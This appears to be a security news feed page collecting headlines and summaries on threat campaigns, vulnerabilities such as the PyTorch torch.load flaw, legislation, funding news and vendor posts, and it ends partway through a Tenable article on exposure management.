Security News

A security architect with the National Labor Relations Board (NLRB) alleges that employees from Elon Musk''s Department of Government Efficiency (DOGE) transferred gigabytes of sensitive data from agency case files in early March, using short-lived accounts configured to leave few traces of network activity. The NLRB whistleblower said the unusual large data outflows coincided with multiple blocked login attempts from an Internet address in Russia that tried to use valid credentials for a newly-created DOGE user account.

by Krebs on Security

CVE drama (@MITREcorp), Control Flow Hijacking w/Data Pointers (@0xLegacyy), Copilot in notepad (@zux0x3a), .NET AOT in Ghidra (@washi_dev), CSWSH in 2025 (@IncludeSecurity), 300ms to Admin (@compasssecurity), and more!

by Bad Sector Labs

Cybersecurity researchers have flagged a new malicious campaign related to the North Korean state-sponsored threat actor known as Kimsuky that exploits a now-patched vulnerability impacting Microsoft Remote Desktop Services to gain initial access. The activity has been named Larva-24005 by the AhnLab Security Intelligence Center (ASEC). ""In some systems, initial access was gained through

by The Hacker News

Since January, threat actors distributing the malware have notched up more than 100 victims.

by Dark Reading

A new Android malware-as-a-service (MaaS) platform named SuperCard X can facilitate near-field communication (NFC) relay attacks, enabling cybercriminals to conduct fraudulent cashouts. The active campaign is targeting customers of banking institutions and card issuers in Italy with an aim to compromise payment card data, fraud prevention firm Cleafy said in an analysis. There is evidence to

by The Hacker News

Despite China- and Thailand-led crackdowns on scam compounds in Myanmar, the organized crime groups behind the cyber scam industry are growing increasingly professional and deepening ties with other regions and illicit actors.

by The Record

The threat actor uses sophisticated social engineering techniques to infect a victim''s device, either with an infostealer or remote access Trojan (RAT).

by Dark Reading

The city of Abilene disconnected servers after officials detected a cyber incident last week.

by The Record

I think you’ll agree with me that growth in the AI landscape is pretty full-on at the moment. I go to sleep and wake up only to find more models have been released, each one outdoing the last one by several orders of magnitude, like some kind of Steve Jobs’ presentation on the latest product release, but on a daily loop.

by SpiderLabs Blog

We''ve selected the top Bluetooth trackers, from AirTags to Tile, to help you keep track of your belongings, no matter if you''re on iOS or Android.

by ZDNET Security

Explore industry moves and significant changes in the industry for the week of April 21, 2025. Stay updated with the latest industry trends and shifts.

by SecurityWeek

Microsoft security chief Charlie Bell says the SFI''s 28 objectives are “near completion” and that 11 others have made “significant progress.” The post Microsoft Purges Dormant Azure Tenants, Rotates Keys to Prevent Repeat Nation-State Hack  appeared first on SecurityWeek.

by SecurityWeek

Microsoft said it''s making strides in guarding its own systems against external threat actors.

by SC Media

The CVE-2025-32434 vulnerability in PyTorch can lead to remote code execution (RCE). Update the PyTorch framework to 2.6.0 version ASAP.

by Kaspersky

Researchers spotted a new North Korea-linked group Kimsuky ‘s campaign, exploiting a patched Microsoft Remote Desktop Services flaw to gain initial access. While investigating a security breach, the AhnLab SEcurity intelligence Center (ASEC) researchers discovered a North Korea-linked group Kimsuky ‘s campaign, tracked as Larva-24005. Attackers exploited an RDP vulnerability to gain initial access to […]

by Security Affairs

Cyberthreat groups increasingly see small and medium-sized businesses, especially those with links to larger businesses, as the weak link in the supply chain for software and IT services.

by Dark Reading

Ukrainian President Volodymyr Zelenskyy has signed a sweeping cybersecurity bill aimed at bolstering the protection of state networks and critical infrastructure amid an ongoing surge in cyberattacks linked to Russia. The newly ratified Law No. 4336-IX, titled “On Amendments to Certain Laws of Ukraine Regarding Information Protection and Cybersecurity of State Information Resources, Critical Information Infrastructure Objects,” introduces broad reforms to Ukraine’s national cyber strategy. It was approved by parliament on March 27 and signed into law last week. With the war now deeply entrenched in both physical and digital domains, the law is designed to enhance Ukraine’s capacity to respond to threats targeting government systems and vital services. Officials said it marks a significant shift toward risk-based management, coordinated national response, and better information sharing. “The implementation of this law will allow Ukraine to integrate even more effectively into the global cybersecurity ecosystem,” said Oleksandr Potii, head of Ukraine’s State Service of Special Communications and Information Protection. “Its adoption will contribute to increasing the resilience of Ukraine''s digital systems against modern challenges.” Ukraine Cybersecurity Bill: Coordinated Response, Crisis Activation, Information Sharing One of the most impactful aspects of the legislation is the creation of a National Cyber Incident Response System. This framework defines the roles, responsibilities, and coordination mechanisms among state response teams and agencies. It also introduces a crisis response protocol, allowing the government to rapidly activate emergency measures when facing large-scale or nation-state cyberattacks. To complement these efforts, the law mandates the creation of a Cyber Incident Information Exchange System. This platform will streamline how incidents are reported, managed, and disclosed across both public and private sectors, fostering early warning and faster remediation. The system’s design is informed by European Union practices and aims to minimize duplication and confusion in high-pressure scenarios. Moving Beyond Legacy CIPS and Toward Lifecycle Risk Management A major structural shift introduced by the law is the abandonment of the Comprehensive Information Protection System (CIPS)—a framework that critics say had grown outdated and inflexible. In its place, Ukraine will adopt a modern risk management approach that emphasizes continuous security across the lifecycle of digital systems. Each system will now be subject to tailored protection profiles, with oversight mechanisms that stress agility over bureaucracy. The legislation also provides for a cybersecurity assessment framework that includes periodic audits. Importantly, the government clarified that the audit process will avoid excessive interference, focusing instead on practical outcomes and organizational maturity. Building Ukraine’s Cyber Workforce To support implementation, the law requires the designation of dedicated cybersecurity officers within government ministries and critical infrastructure sectors. These roles are tasked with leading internal cyber policy, managing compliance, and interfacing with national authorities during incidents. The move signals Ukraine’s intent to professionalize its cybersecurity workforce and reduce fragmentation in how cyber defense is managed at the institutional level. Aligned With European Norms In addition to domestic reforms, the legislation also positions Ukraine to align more closely with EU cybersecurity directives, including requirements on: Cyber incident reporting Roles and mandates of national response teams Implementation of cybersecurity risk management in both public and private sectors. Ukrainian lawmakers framed the law as a vital step in harmonizing legal frameworks with European partners, paving the way for deeper integration into transnational cybersecurity cooperation. Attacks Surge, Prompting Urgency CERT-UA, the country’s national Computer Emergency Response Team, reported a 70% increase in cyber incidents in 2024 compared to the previous year. The rise includes espionage, infrastructure sabotage, and psychological warfare campaigns—many of them linked to Russia. As of early 2025, the upward trend shows no sign of slowing. In a public alert, CERT-UA said there is growing sophistication and persistence of attackers, especially those targeting telecommunications, energy, and military command systems. Also read: Massive Cyberattack Hits Ukraine Railways, Disrupting Online Ticket Sales Ukraine’s digital space is as much a frontline as the physical battlefield, said Potii. The country''s defenses must evolve constantly to match the adversary. Ukraine’s ability to operationalize the law’s provisions will depend on support from both domestic institutions and international partners. NATO allies and European cyber agencies are expected to play a role in technical assistance, as Ukraine seeks to reinforce its cyber posture not only for wartime resilience but long-term digital sovereignty. With this law, Ukraine joins a growing list of countries recognizing that modern cybersecurity policy must be proactive, deeply integrated, and strategically aligned across government and critical infrastructure sectors.

by The Cyber Express

How long does it take your security teams to detect a potential threat, correlate relevant data, and initiate a response... The post Meeting the 555 Benchmark appeared first on Sysdig.

by Sysdig

Fake Booking.com emails trick hotel staff into running AsyncRAT malware via fake CAPTCHA, targeting systems with remote access…

by Hackread

Darktrace is proud to announce we’ve been recognized as a Challenger in our first appearance in the Gartner® Magic Quadrant™ for Email Security. In the report you’ll get key insights into the evolving email threat landscape, the requirements of a modern email security platform and the role of AI in advanced threat detection.

by Darktrace

Recent Fog samples are spread through phishing emails referencing pay adjustments.

by SC Media

Cybersecurity firms tend to be more software- and service-oriented than their peers, and threats tend to increase during a downturn, leaving analysts hopeful that the industry will buck a recession.

by Dark Reading

There’s nothing like the freedom of the open road when you’re on a motorcycle. But staying connected while…

by Hackread

Japan’s Financial Services Agency (FSA) warned last week of the growing threat of hacked trading accounts that has resulted in nearly US $700 million in unauthorized trades since March. The FSA documented a sharp increase in the number of such fraudulent trades, from 33 in February to 685 in March and 736 through the first 16 days of April. Accounts in at least six securities firms have been targeted in the attacks. While the FSA cited stolen login information from “fake websites (phishing sites) disguised as websites of real securities companies,” a separate advisory from the Japan Securities Dealers Association (JSDA) also cited infostealer malware as a cause of some stolen credentials. The surge in compromised accounts has itself been used as a pretext for phishing attacks, JSDA said. “Taking advantage of this situation, we have also received many reports of emails being sent in the name of the Japan Securities Dealers Association or securities companies, warning people to be careful of phishing scams, with the aim of getting people to click on suspicious URLs,” the JSDA said. Chinese Stocks Left in Hacked Trading Accounts The number of unauthorized account accesses has also increased sharply in recent months, from 43 in February to 1,422 in March, and 1,847 through the first 16 days of April, for a three-month total of 3,312 compromised accounts, according to the FSA. In most cases, the FSA said “fraudsters gain unauthorized access to victim accounts and manipulate them to sell stocks etc. in the accounts, and use the proceeds to buy Chinese stocks etc. As a result of the fraudulent transactions, the Chinese stocks etc. remain in the victim accounts.” That suggests that share price manipulation could be one possible motive of the fraudulent transactions, to artificially move the share prices of Chinese stocks and other targeted securities that the fraudsters may have a position in. While the FSA listed total sales (50.6 billion yen) and purchase amounts (44.8 billion yen) for the fraudulent trades over the last three months, the agency noted that those figures do not equate to investor losses from the scams, merely the total amount of the transactions. Protecting Against Hacked Trading Accounts The FSA and JSDA both issued steps investors should take to protect themselves from account hacks. Don’t open links contained in emails or texts “even if the sender looks familiar.” Bookmark the correct website URL for your security company and access it only from the bookmark. Enable enhanced security features offered by securities companies such as multi-factor authentication and notification services when logging in, executing a trade, and withdrawing funds, and watch for suspicious transactions. Don’t reuse passwords, and don’t use simple passwords that are easy to guess. Combine numbers, uppercase and lowercase letters, and symbols. The FSA urged account holders to check the status of their accounts frequently, “and if you suspect that you may have entered information on a suspicious website or are engaged in suspicious transactions, contact the inquiry desk of your securities company and change your passwords immediately.” Dark web monitoring is a good resource for discovering leaked account credentials, both for financial services companies and their customers.

by The Cyber Express

by SC Media

by SC Media

Scarcity and Abundance in 2025, Nominative Determinism, Because Computers Are Stupid, NahamCon 2025, How To Get The Most Out of A Book, and more...

by Hive Five

The problem is simple: all breaches start with initial access, and initial access comes down to two primary attack vectors – credentials and devices. This is not news; every report you can find on the threat landscape depicts the same picture.  The solution is more complex. For this article, we’ll focus on the device threat vector. The risk they pose is significant, which is why device

by The Hacker News

The vulnerability is only found in the vendor''s router series and can be triggered by an attacker using a crafted request — all of which helps make it a highly critical vulnerability with a 9.2 CVSS score.

by Dark Reading

ChatGPT can ''read'' your photos for location clues - even without embedded GPS or EXIF data. Here''s why that could be a problem.

by ZDNET Security

Bob Lord and Lauren Zabierek both posted on LinkedIn Monday morning that they were resigning from the Cybersecurity and Infrastructure Security Agency.

by The Record

Can a harmless click really lead to a full-blown cyberattack? Surprisingly, yes — and that’s exactly what we saw in last week’s activity. Hackers are getting better at hiding inside everyday actions: opening a file, running a project, or logging in like normal. No loud alerts. No obvious red flags. Just quiet entry through small gaps — like a misconfigured pipeline, a trusted browser feature,

by The Hacker News

North Korean cryptocurrency thieves abusing Zoom Remote collaboration feature to target cryptocurrency traders with malware. The post North Korean Cryptocurrency Thieves Caught Hijacking Zoom ‘Remote Control’ Feature appeared first on SecurityWeek.

by SecurityWeek

Researchers advise security teams to block sources of bulletproof hosting.

by SC Media

Morphisec discovers a new malware threat ResolverRAT, that combines advanced methods for running code directly in computer memory,…

by Hackread

The Aqara Camera Hub G5 Pro provides AI-powered visual recognition technology with a host of home security features. Best of all, it doesn''t require a monthly subscription.

by ZDNET Security

The AI security race is on — and it will be won where defenders come together with developers and researchers to do things right.

by Dark Reading

San Francisco startup closes a hefty $75 million Series A funding round led by Khosla Ventures and Mayfield. The post Exaforce Banks Hefty $75 Million for AI-Powered SOC Remake appeared first on SecurityWeek.

by SecurityWeek

Sysdig enters a major new chapter this month with full native support for Windows environments, a strategic unification of core... The post What’s new in Sysdig — April 2025 appeared first on Sysdig.

by Sysdig

U.S. Senators Gary Peters (D-MI) and Mike Rounds (R-SD) have introduced a bipartisan bill to extend vital provisions from the Cybersecurity Information Sharing Act of 2015. The new legislation, titled the Cybersecurity Information Sharing Extension Act, seeks to maintain and strengthen information-sharing mechanisms between the private sector and the federal government, particularly through the Department of Homeland Security (DHS).  The original Cybersecurity Information Sharing Act was enacted in 2015 to encourage businesses to voluntarily share cybersecurity threat indicators, such as software vulnerabilities, malware signatures, and malicious IP addresses, with the federal government. This collaborative model has been a cornerstone in protecting critical infrastructure and private data from a wide range of cyber threats, including attacks from nation-state actors and cybercriminals.  With the original provisions set to expire, the Cybersecurity Information Sharing Extension Act would renew them for an additional ten years, preserving legal protections that have encouraged companies to share threat data without fear of legal or regulatory repercussions.  The Bipartisan Bill  “As cybersecurity threats grow increasingly sophisticated, information sharing is not just valuable—it remains essential for our national security,” said Senator Peters, who serves as the Ranking Member of the Homeland Security and Governmental Affairs Committee. “For the past ten years, these critical protections have helped to address rapidly evolving cybersecurity threats, and this bipartisan bill will renew them so we can continue this collaborative partnership between the private sector and government to bolster our nation’s cybersecurity defenses against a wide range of adversaries.”  Senator Rounds echoed these sentiments, emphasizing the necessity of maintaining these legal protections to ensure continued cooperation across the public and private sectors. “The Cybersecurity Information Sharing Act of 2015 has been instrumental in strengthening our nation’s cyber defenses by enabling critical information sharing between the private sector and government,” said Rounds. “Allowing this legislation to lapse would significantly weaken our cybersecurity ecosystem, removing vital liability protections and hampering defensive operations across both the defense industrial base and critical infrastructure sectors.”  Supporting Cybersecurity in the Region  Since its inception, the legislation has helped uncover and mitigate major cyber incidents, including the high-profile SolarWinds attack, as well as ongoing campaigns like Volt Typhoon and Salt Typhoon. These incidents demonstrated the need for rapid, coordinated responses, which were made possible through the sharing of actionable threat intelligence. Moreover, the Department of Homeland Security (DHS), primarily through the Cybersecurity and Infrastructure Security Agency (CISA), has leveraged this shared information to support federal, state, and local agencies, as well as private companies across critical sectors. Through initiatives like the Joint Cyber Defense Collaborative and Information Sharing and Analysis Centers (ISACs), CISA ensures that threat alerts are disseminated widely to help communities and businesses preempt and respond to attacks. Importantly, the legislation also includes strong privacy safeguards. It mandates that personally identifiable information (PII) be stripped from threat data before it is shared, ensuring that public safety does not come at the expense of individual privacy rights. Senator Peters has been a longstanding advocate for improving cybersecurity preparedness. His legislative efforts have led to the enactment of several bipartisan bills aimed at enhancing cybersecurity support for K-12 schools, securing federal supply chains, strengthening the cybersecurity workforce, and improving protection for state and local governments. He also authored a landmark provision requiring critical infrastructure entities to report major cyber incidents or ransomware payments to CISA.  Conclusion  The reauthorization of the Cybersecurity Information Sharing Extension Act reflects a strong commitment to staying protected from threats by fostering ongoing collaboration between the government and the private sector. With cyberattacks growing more frequent and targeted, the legislation introduced by Senators Peters and Rounds takes a crucial step in reinforcing the nation''s digital defenses. As the bill advances through Congress, it marks an important moment of bipartisan cooperation in cybersecurity, demonstrating that addressing cyber threats effectively requires a unified approach and sustained partnership between the public and private sectors. 

by The Cyber Express

Kenzo Security has emerged from stealth mode after 18 months of developing its agentic AI security platform. The post Kenzo Security Raises $4.5 Million for Agentic AI Security Operations Platform appeared first on SecurityWeek.

by SecurityWeek

Government-backed hacking groups from North Korea (TA427), Iran (TA450), and Russia (UNK_RemoteRogue, TA422) are now using the ClickFix…

by Hackread

Overview Cyble’s vulnerability intelligence unit examined 26 vulnerabilities and 14 dark web exploit claims in recent reports to clients and flagged 10 of the vulnerabilities as meriting high-priority attention by security teams. The vulnerabilities, which can lead to system compromise and data breaches, affect Fortinet products, WordPress plugins, Linux and Android systems, and more. The Top IT Vulnerabilities Here are some of the vulnerabilities highlighted by Cyble vulnerability intelligence researchers in recent reports. CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762 are critical vulnerabilities in Fortinet FortiGate devices that have been actively exploited to gain unauthorized remote access. CVE-2022-42475 is a heap-based buffer overflow vulnerability in the SSL-VPN component that allows remote code execution, while the other two enable initial access and privilege escalation. Recently, Fortinet revealed that attackers exploited these vulnerabilities to gain initial access and then used a novel post-exploitation technique to maintain persistent read-only access even after patches were applied. This technique involves creating a symbolic link (symlink) in the SSL-VPN language files folder that connects the user file system to the root file system, allowing attackers to evade detection and continue accessing device configurations. CVE-2024-48887 is a critical unverified password change vulnerability in the Fortinet FortiSwitch GUI that could allow a remote, unauthenticated attacker to change administrator passwords without prior access by sending specially crafted HTTP requests to the set_password endpoint, which lacks proper input validation and authentication checks. This could enable the attacker to gain administrative privileges on the vulnerable FortiSwitch device, potentially allowing them to manipulate configurations or move laterally within internal networks. Cyble’s ODIN vulnerability search tool has identified nearly 1 million potentially exposed Fortinet instances: CVE-2025-3102 is a critical authentication bypass vulnerability in the SureTriggers: All-in-One Automation Platform plugin for WordPress, affecting versions up to and including 1.0.78. The flaw could allow unauthenticated attackers to create administrator accounts on websites where the plugin is installed and activated but not configured with an API key. The issue arises due to a missing empty value check on the ''secret_key'' parameter in the plugin''s authentication function, potentially enabling attackers to bypass authentication by sending an empty authorization header. CVE-2024-53197 is a vulnerability in the Linux kernel''s ALSA USB audio driver. It affects systems using USB audio devices, particularly Extigy and Mbox devices. The vulnerability involves potential out-of-bounds memory access that could occur when a malicious USB device provides an invalid bNumConfigurations value, potentially leading to system crashes or privilege escalation if an attacker has physical access to the system. Serbian authorities reportedly exploited the flaw to unlock confiscated Android devices as part of a zero-day exploit chain. CVE-2025-31334 is a vulnerability affecting WinRAR, a popular file archiver utility for Windows, that could allow attackers to bypass the Windows ""Mark of the Web"" (MotW) security feature. This feature is designed to flag files downloaded from the internet as potentially unsafe and prompt users with a warning before executing them. Attackers could craft a malicious archive containing a symbolic link (symlink) pointing to an executable file. When opened using a vulnerable version of WinRAR, the MotW warning is bypassed, allowing the executable to run without user confirmation. CVE-2025-30065 is a critical remote code execution (RCE) vulnerability in the Apache Parquet Java library, specifically affecting the parquet-avro module. Attackers could potentially create a malicious Parquet file that allows them to execute arbitrary code when imported into a vulnerable system. This typically requires social engineering tactics to convince users to open the malicious file. The vulnerability has a maximum CVSS score of 10.0, indicating high severity and ease of exploitation. Vulnerabilities and Exploits on Underground Forums Cyble researchers also observed multiple threat actors on dark web forums discussing exploits and weaponizing different vulnerabilities, including some claimed zero-day vulnerabilities. Some of the vulnerabilities under discussion include: CVE-2025-23120: A critical vulnerability in Veeam Backup & Replication that could allow an authenticated, remote attacker with valid domain privileges to execute code on the target system. CVE-2025-24071: A high-severity vulnerability in Microsoft Windows File Explorer that could allow unauthorized attackers to steal NTLM hashes without user interaction by exploiting the automatic processing of .library-ms files within RAR/ZIP archives. When such a file containing a malicious SMB path is extracted, Windows Explorer triggers an SMB authentication request, leading to the disclosure of the user''s NTLM hash. CVE-2025-22457: A critical stack-based buffer overflow vulnerability affecting multiple Ivanti products, including Ivanti Connect Secure, Policy Secure, and ZTA Gateways, that could allow remote, unauthenticated attackers to execute arbitrary code on vulnerable devices, leading to remote code execution (RCE). CVE-2025-2005: A vulnerability affecting the Front-End Users plugin for WordPress that allows unauthenticated arbitrary file uploads, which attackers could exploit to upload malicious files, potentially leading to code execution or other security breaches on affected websites. Cyble Recommendations To protect against vulnerabilities and exploits, Cyble recommends that organizations implement the following best practices: Regularly update all software and hardware systems with the latest patches from official vendors. Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency. Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats. Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents, including ransomware-resistant backups. Regularly test and update the plan to ensure its effectiveness and alignment with current threats. Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response. Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions. Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate system vulnerabilities. Complement these exercises with periodic security audits to ensure compliance with security policies and standards. Conclusion Security teams should prioritize actively exploited vulnerabilities—and those at high risk of exploitation—when determining their patching efforts. They should also consider other indicators of risk, such as web exposure, data, and application sensitivity. Implementing strong security practices is essential for protecting sensitive data and maintaining system integrity. A comprehensive attack surface management solution like Cyble can monitor for threats, vulnerabilities, and leaks specific to your environment, helping you harden cyber defenses and respond quickly to events before they become bigger incidents. To access full IT vulnerability and other reports from Cyble, click here. The post IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit appeared first on Cyble.

by CYBLE

Cybersecurity researchers have disclosed a surge in ""mass scanning, credential brute-forcing, and exploitation attempts"" originating from IP addresses associated with a Russian bulletproof hosting service provider named Proton66. The activity, detected since January 8, 2025, targeted organizations worldwide, according to a two-part analysis published by Trustwave SpiderLabs last week.  ""Net

by The Hacker News

Microsoft confirms that the weekend Entra account lockouts were caused by the invalidation of short-lived user refresh tokens that were mistakenly logged into internal systems. [...]

by BleepingComputer

The CVE could allow unauthenticated attackers to gain full access to a device. Many of these devices are widely used in IoT and telecom platforms.

by Cybersecurity Dive

With 51% of internet traffic now bot-driven and a growing share of it malicious, organizations must prepare for an era of more evasive, AI-assisted automation. The post Bot Traffic Surpasses Humans Online—Driven by AI and Criminal Innovation appeared first on SecurityWeek.

by SecurityWeek

Welcome to Picus Security''s monthly cyber threat intelligence roundup! 

by Picus Security

Dallas, United States, TX, 21st April 2025, CyberNewsWire

by Hackread

During incident response activities, our GERT team discovered Lumma Stealer in a customer’s infrastructure. Our experts conducted an investigation and analyzed its distribution scheme in detail.

by Securelist

Discover how anomaly detection deployed across core network segments delivers a more effective approach to ICS security.

by Darktrace

Unveiled today, AI Assist aims to help public safety officers do their jobs more efficiently - and safely. Here''s how it works.

by ZDNET Security

Japanese regulators published an urgent warning about hundreds of millions of dollars worth of unauthorized trades being conducted on hacked brokerage accounts in the country.

by The Record

Cybercriminals are distributing FOG ransomware through phishing emails that spoof ties to the U.S. Department of Government Efficiency (DOGE), embedding politically themed messages and exploiting old vulnerabilities to compromise victims across multiple sectors. The campaign was uncovered by Trend Micro researchers during their analysis of nine malware samples uploaded to VirusTotal between March 27 and … The post FOG Ransomware Impersonates U.S. DOGE to Infect Targets appeared first on CyberInsider.

by Cyber Insider

A security researcher has uncovered a high-impact phishing campaign exploiting multiple vulnerabilities in Google''s infrastructure, enabling attackers to send alarmingly realistic emails from legitimate Google domains. The campaign, initially dismissed by Google as “working as intended,” combines weaknesses in Google Sites and OAuth notifications to craft phishing messages that bypass standard security checks and appear … The post Google Exploit Bypasses DKIM Protections to Deliver Realistic Alerts appeared first on CyberInsider.

by Cyber Insider

Countries around the world are preparing for greater digital conflict as increasing global tensions and a looming trade war have raised the stakes. The post Countries Shore Up Their Digital Defenses as Global Tensions Raise the Threat of Cyberwarfare appeared first on SecurityWeek.

by SecurityWeek

There are plenty of frameworks, tools and strategies to help map out a risk-resilient cloud infrastructure.

by Cybersecurity Dive

The technology giant, as part of its Secure Future Initiative program, has overhauled security practices following a series of crippling nation-state-linked cyberattacks.

by Cybersecurity Dive

For the latest discoveries in cyber research for the week of 21st April, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Retail giant Ahold Delhaize has suffered a cyber-attack resulting in data theft of customer information from its US business systems. The attack, claimed by ransomware group INC Ransom, impacted Ahold Delhaize USA […] The post 21st April – Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

Customs and Border Protection has broad authority to search travelers’ devices when they cross into the United States. Here’s what you can do to protect your digital life while at the US border.

by WIRED Security News

A major security flaw has been discovered in PyTorch, the widely used open-source machine learning framework. Identified as CVE-2025-32434, this newly reported PyTorch vulnerability allows attackers to remotely execute arbitrary code on systems that load AI models, even when protective settings like weights_only=True are enabled. This critical vulnerability impacts all PyTorch versions up to and including 2.5.1, according to a security advisory published earlier this week. The issue has been addressed in version 2.6.0, which has been made available through pip. PyTorch Vulnerability Details  The root of the issue lies within PyTorch’s torch.load() function, a core component frequently used for loading serialized models. For years, developers have relied on the weights_only=True flag to protect against potentially harmful code embedded in model files. However, that protect has now been proven insufficient. Security researcher Ji’an Zhou demonstrated that the weights_only=True setting can be bypassed, enabling attackers to execute remote commands. This revelation directly contradicts PyTorch''s own documentation, which previously recommended the setting as a reliable mitigation method.  This issue highlights the evolving nature of ML security,"" the PyTorch team stated. ""We urge all users to update immediately and report suspicious model behavior.""  Who Is at Risk?  Any application, research tool, or cloud service that relies on torch.load() using unpatched PyTorch versions is vulnerable. This includes systems designed for inference, federated learning, and model hub integrations. An attacker could easily upload a tampered model to a public repository or inject it into a software supply chain. When a user loads the compromised model, the exploit would trigger, potentially granting full control over the target system. Given the low complexity and high impact of the attack, security experts have classified the vulnerability as critical.  According to GitHub''s CVE record, CVE-2025-32434 carries a CVSS 4.0 score of 9.3, placing it firmly in the “Critical” category. The vector string highlights its severity: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N  In simpler terms, it requires no special privileges, user interaction, or advanced exploitation techniques, making it especially dangerous for real-world applications. Immediate Actions Recommended  The PyTorch team strongly urges all users to take the following steps:  Upgrade to PyTorch 2.6.0 immediately using pip install-- upgrade torch.  Audit existing AI models, especially those sourced from third-party or public repositories.  Monitor official security channels, including the PyTorch GitHub Security page and the related GitHub Advisory (GHSA-53q9-r3pm-6pq6), for updates.  Conclusion   The discovery of the CVE-2025-32434 PyTorch vulnerability highlights the gaps in the AI community. Even widely trusted machine learning frameworks are not immune to serious security flaws. This critical vulnerability, which affects all PyTorch versions up to 2.5.1, allows remote code execution, even with weights_only=True enabled.   To protect systems, users must immediately upgrade to PyTorch 2.6.0, audit existing models—especially those from third-party sources—and closely monitor official security channels.

by The Cyber Express

North Korean IT workers are reportedly using real-time deepfakes to secure remote work, raising serious security concerns. We explore the implications. The post False Face: Unit 42 Demonstrates the Alarming Ease of Synthetic Identity Creation appeared first on Unit 42.

by Palo Alto Networks - Unit42

SiliconAngle reports that Cy4Data Labs, a California-based data protection startup, has obtained $10 million from its initial funding round, which will be allocated toward bolstering sales and marketing for its Cy4Secure data security solution that allows in-use data encryption and protection.

by SC Media

U.S. Office of Management and Budget Director Russell Vought has been urged by a group of 48 House Democrats to provide more details regarding unauthorized artificial intelligence usage by the Elon Musk-led Department of Government Efficiency, FedScoop reports.

by SC Media

Bruce Schneier on security theater, AI snake oil, and the limits of cryptographic morality.

by SC Media

Lantronix’s XPort device is affected by a critical vulnerability that can be used for takeover and disruption, including in the energy sector. The post Lantronix Device Used in Critical Infrastructure Exposes Systems to Remote Hacking appeared first on SecurityWeek.

by SecurityWeek

Cybernews reports that dark web marketplace Nemesis Market had its founder Behrouz Parsarad indicted by the U.S.

by SC Media

Alleged SmokeLoader botnet operator Nicholas Moses, also known as ""scrublord"", has been charged by federal prosecutors with a count of conspiracy to commit fraud and other computer-related activity over the compromise of more than 65,000 individuals'' personal data and credentials with the malware, reports The Record, a news site by cybersecurity firm Recorded Future.

by SC Media

A new campaign by ELUSIVE COMET, a threat actor responsible for large-scale cryptocurrency thefts, exploits Zoom''s remote control feature through social engineering. The attack came to light when Dan Guido, CEO of Trail of Bits, received a fraudulent interview request supposedly from “Bloomberg Crypto” via Twitter. The request, routed through unofficial Calendly links and Gmail … The post Zoom’s Remote Control Feature Exploited in ELUSIVE COMET Attacks appeared first on CyberInsider.

by Cyber Insider

‘SuperCard X’ – a new MaaS – targets Androids via NFC relay attacks, enabling fraudulent POS and ATM transactions with stolen card data. Cleafy researchers discovered a new malware-as-a-service (MaaS) called SuperCard X targeting Android devices with NFC relay attacks for fraudulent cash-outs. Attackers promote the MaaS through Telegram channels, analysis shows SuperCard X builds […]

by Security Affairs

Shrinking the world''s carbon footprint will require poring over vast datasets to spot solutions — something computers do better and faster than humans.

by ITPro Today

A large-scale ad fraud operation called ''Scallywag'' is monetizing pirating and URL shortening sites through specially crafted WordPress plugins that generate billions of daily fraudulent requests. [...]

by BleepingComputer

A brute-force attack is a trial-and-error hacking method cybercriminals use to decode login information and encryption keys to gain unauthorized access to systems.

by ComputerWeekly

This installment of our three-part series on SQL commands explores essential SQL commands for inserting, modifying, and deleting data within a SQL Server table.

by ITPro Today

Each Monday, the Tenable Exposure Management Academy provides the practical, real-world guidance you need to shift from vulnerability management to exposure management. In this post, Tenable CSO Robert Huber shares practical advice on using an exposure management program to focus on risks that have business impact. You can read the entire Exposure Management Academy series here.There’s a trap security practitioners can often fall into. No, it’s not some tactic employed by the bad guys to trip us up. It’s a fairly simple trick of the mind: thinking that every risk deserves urgent attention. Maybe it’s human nature. If there’s a problem — no matter how big or small — some of us are just wired to want to fix it right away and get it off our punch list. But I’ve learned the hard way that not all risks are created equal. So treating each one as number-one priority is a surefire shortcut to burnout and inefficiency.Like many of you, here at Tenable, we’ve been building our own internal exposure management program. On this journey, one of the most profound lessons I’ve learned is to prioritize risk based on business impact. Moving to that line of thinking has helped me bring clarity to chaos. It has reduced the noise and allowed me to focus myself and my team on what really matters, which is the key to a successful exposure management program.Start with the right dataOne of the big struggles for security professionals is context switching. When you meet with your business leaders to update them, you often have to scramble to pull together inputs from a dozen different tools and teams. That’s because the data is siloed, often incomplete and nearly impossible to compare. Our job in security is to provide these leaders — maybe your CEO or head of a business unit — with a clear, coherent picture of the most acute exposures. Try as we might, those pictures have been partly cloudy with a chance of inaccuracies.So, as we started on the exposure management journey, our initial step was to assimilate the data. And I mean all of it. With help from Vulcan (now part of Tenable), we combed through tools, platforms and teams for every scrap of data. Believe me, until you do that, you can’t prioritize meaningfully. You’re just guessing.Understand risk in contextOK, bringing all that data together was a huge task. You’ll probably think, “Mission accomplished!” But that’s just the start.Once the data’s in one place, the real work begins. That’s when I ask: What does this risk mean in context?You should look at it from a couple of angles: First, consider it in the context of other risks across your organization. Then, think about the risks in the context of the business itself. How could this risk affect your revenue, operations or reputation? If you don’t think this way right off the bat, you’ll just end up reacting to the loudest alert, not the most important one. And we know how that goes. As I heard often during officer candidate school in the military: focus on the important, not the urgent — which is especially helpful when you don’t have enough time in the day.Identify the systemic issuesExposure management isn’t about patching one vulnerability at a time. It’s about identifying what I call the big rocks. Whatever you call them, these are systemic issues that affect thousands of assets or users. Left unaddressed, they can truly put the business at risk.Sometimes we don’t fix those big rocks right away. That might be because a patch broke a critical system or legacy infrastructure doesn’t support a specific control. When that happens, the exposure becomes a tracked business risk on our risk register. And it stays on the radar until we resolve it.That’s a big shift from the old model, where issues could disappear into ticket queues with no clear owner and no resolution in sight. With 